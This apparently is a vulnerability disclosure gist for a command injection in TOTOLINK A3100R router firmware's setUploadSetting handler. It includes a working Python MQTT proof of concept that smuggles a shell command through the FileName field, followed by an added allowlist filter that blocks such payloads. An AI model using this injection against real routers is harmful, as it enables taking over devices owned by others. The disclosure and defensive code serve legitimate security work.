@Swind1er
Created May 20, 2024 13:01

setUploadSettingRCE

PoC

Firmware Version: A3100R_V4.1.2cu.5247_B20211129

You can download the firmware here: Swind1er/Download (github.com)

Vulnerability Proof of Concept Video:

https://github.com/Swind1er/Video/raw/main/A3100R_setUploadSetting_RCE%20poc.mp4

In the CGI function setUploadSetting in /lib/cste_modules/upgrade.so, the string content of the user-supplied FileName field is not filtered. Sending a malicious FileName value through the MQTT service leads to arbitrary command execution.

Exploit

import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("192.168.138.128",1883,60)
client.publish('totolink/router/setting/setUploadSetting',
               payload='{"topicurl":"setting/setUploadSetting",\
                "FileName":";echo \'123\'>>/tmp/flag.txt;echo"}')
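
A defensive counterpart to the PoC, added here and not part of the original gist or of TOTOLINK's code: an allowlist check on the FileName field that a broker-side filter or MQTT monitor could apply to messages on this topic. The allowlist pattern and the names inspect_publish, SAFE_NAME and SAMPLES are assumptions for illustration, and the sample messages are constructed.

```python
import json
import re

# Topic and field name as they appear in the PoC on this page.
TOPIC = "totolink/router/setting/setUploadSetting"
FIELD = "FileName"

# Assumption: a legitimate upload name is a plain basename of letters, digits,
# dot, underscore and hyphen. Adjust to the naming scheme actually in use.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9._-]{0,127}")


def _pairs(pairs):
    # Keep duplicate keys visible: json.loads would otherwise keep only the
    # last one, while another parser may read the first.
    keys = [k for k, _ in pairs]
    if keys.count(FIELD) > 1:
        raise ValueError("duplicate FileName key")
    return dict(pairs)


def inspect_publish(topic, payload):
    """Return (verdict, reason); verdict is "ignore", "allow" or "block"."""
    if topic != TOPIC:
        return ("ignore", "topic not monitored")
    try:
        if isinstance(payload, bytes):
            payload = payload.decode("utf-8")
        message = json.loads(payload, object_pairs_hook=_pairs)
    except ValueError as exc:  # bad UTF-8, bad JSON or duplicate key
        return ("block", "unparseable payload: %s" % exc)
    if not isinstance(message, dict):
        return ("block", "payload is not a JSON object")
    if FIELD not in message:
        return ("allow", "no FileName field")
    name = message[FIELD]
    if not isinstance(name, str) or not SAFE_NAME.fullmatch(name):
        return ("block", "FileName outside allowlist: %r" % (name,))
    return ("allow", "FileName matches allowlist")


# Constructed samples; the second has the shape of the PoC payload.
SAMPLES = [
    '{"topicurl":"setting/setUploadSetting","FileName":"A3100R_fw.web"}',
    '{"topicurl":"setting/setUploadSetting","FileName":";echo x;echo"}',
    '{"FileName":"fw.web","FileName":";echo x;echo"}',
    '{"FileName":["fw.web"]}',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_publish(TOPIC, sample))
```

Filtering at the broker only reduces exposure; the same allowlist belongs in the firmware handler, applied to FileName before the value is used.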